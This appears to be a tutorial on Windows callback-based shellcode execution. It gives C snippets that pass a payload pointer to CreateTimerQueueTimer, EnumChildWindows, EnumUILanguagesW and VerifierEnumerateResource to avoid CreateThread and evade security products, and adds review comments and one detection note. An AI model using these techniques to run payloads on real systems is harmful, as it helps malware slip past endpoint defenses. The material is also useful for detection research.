Callback Process Injection

Introduction

Callbacks in Windows are commonly used to handle specific events when they occur based on a condition. They are used in event handling, window management, and multithreading.

We can abuse callback functions to execute payloads in the local process to avoid security solutions and the use of API functions like CreateThread.

Note: This only works in the local process and cannot be used to achieve remote process injection.

A list of callbacks can be found in the GitHub repo below.

CreateTimerQueueTimer

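// Register a timer on the default timer queue with Payload as its WAITORTIMERCALLBACK.
// DueTime and Period are DWORD integers, not pointers, so pass 0 rather than NULL
// (per the API docs a Period of 0 signals the timer once). The callback is invoked by
// a timer-queue worker thread, so no thread is created by this code directly.
// GetLastError() returns a DWORD; print it with %lu, not %d (mismatched specifier is UB).
// NOTE(review): hTimer is never released with DeleteTimerQueueTimer in this snippet;
// whether the enclosing code does so cannot be told from here.
HANDLE hTimer = NULL;

if (!CreateTimerQueueTimer(&hTimer, NULL, (WAITORTIMERCALLBACK)Payload, NULL, 0, 0, 0)) {
	printf("[!] CreateTimerQueueTimer Failed With Error : %lu \n", GetLastError());
	return -1;
}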

EnumChildWindows

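	// Pass Payload as the WNDENUMPROC. With hWndParent == NULL the API docs state the
	// call is equivalent to EnumWindows, and the callback runs synchronously on the
	// calling thread for each window enumerated.
	// NOTE(review): per the API docs the return value of EnumChildWindows "is not used",
	// so this branch is not a reliable failure check; it is kept for parity with the
	// other snippets. GetLastError() is a DWORD -> %lu.
	if (!EnumChildWindows(NULL, (WNDENUMPROC)Payload, NULL)) {
		printf("[!] EnumChildWindows Failed With Error : %lu \n", GetLastError());
		return -1;
	}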

EnumUILanguagesW

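	// Pass Payload as the UILANGUAGE_ENUMPROCW. MUI_LANGUAGE_NAME requests language
	// names rather than LANGIDs; the callback is invoked on the calling thread once per
	// enumerated UI language. GetLastError() is a DWORD -> %lu, not %d.
	if (!EnumUILanguagesW((UILANGUAGE_ENUMPROCW)Payload, MUI_LANGUAGE_NAME, NULL)) {
		printf("[!] EnumUILanguagesW Failed With Error : %lu \n", GetLastError());
		return -1;
	}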

VerifierEnumerateResource

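	// Resolve VerifierEnumerateResource from verifier.dll at runtime and pass Payload
	// as the AVRF_RESOURCE_ENUMERATE_CALLBACK. fnVerifierEnumerateResource is a
	// function-pointer typedef declared elsewhere (not shown here).
	// Defender note: loading verifier.dll into a process that is not running under
	// Application Verifier is unusual; the LoadLibraryA module-load event is a plain
	// telemetry signal for this sequence.
	HMODULE hModule = NULL;
	fnVerifierEnumerateResource pVerifierEnumerateResource = NULL;

	hModule = LoadLibraryA("verifier.dll");
	if (hModule == NULL){
		// GetLastError() returns a DWORD -> %lu (the original %d mismatched the type).
		printf("[!] LoadLibraryA Failed With Error : %lu \n", GetLastError());
		return -1;
	}

	// GetProcAddress returns FARPROC; cast explicitly to the typedef'd pointer type
	// instead of relying on an implicit incompatible-pointer conversion.
	pVerifierEnumerateResource = (fnVerifierEnumerateResource)GetProcAddress(hModule, "VerifierEnumerateResource");
	if (pVerifierEnumerateResource == NULL) {
		printf("[!] GetProcAddress Failed With Error : %lu \n", GetLastError());
		return -1;
	}

	// Must set the AvrfResourceHeapAllocation flag to run the payload
	// NOTE(review): the ULONG result is ignored and hModule is never released with
	// FreeLibrary in this snippet; whether the enclosing code handles either cannot
	// be told from here.
	pVerifierEnumerateResource(GetCurrentProcess(), NULL, AvrfResourceHeapAllocation, (AVRF_RESOURCE_ENUMERATE_CALLBACK)Payload, NULL);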
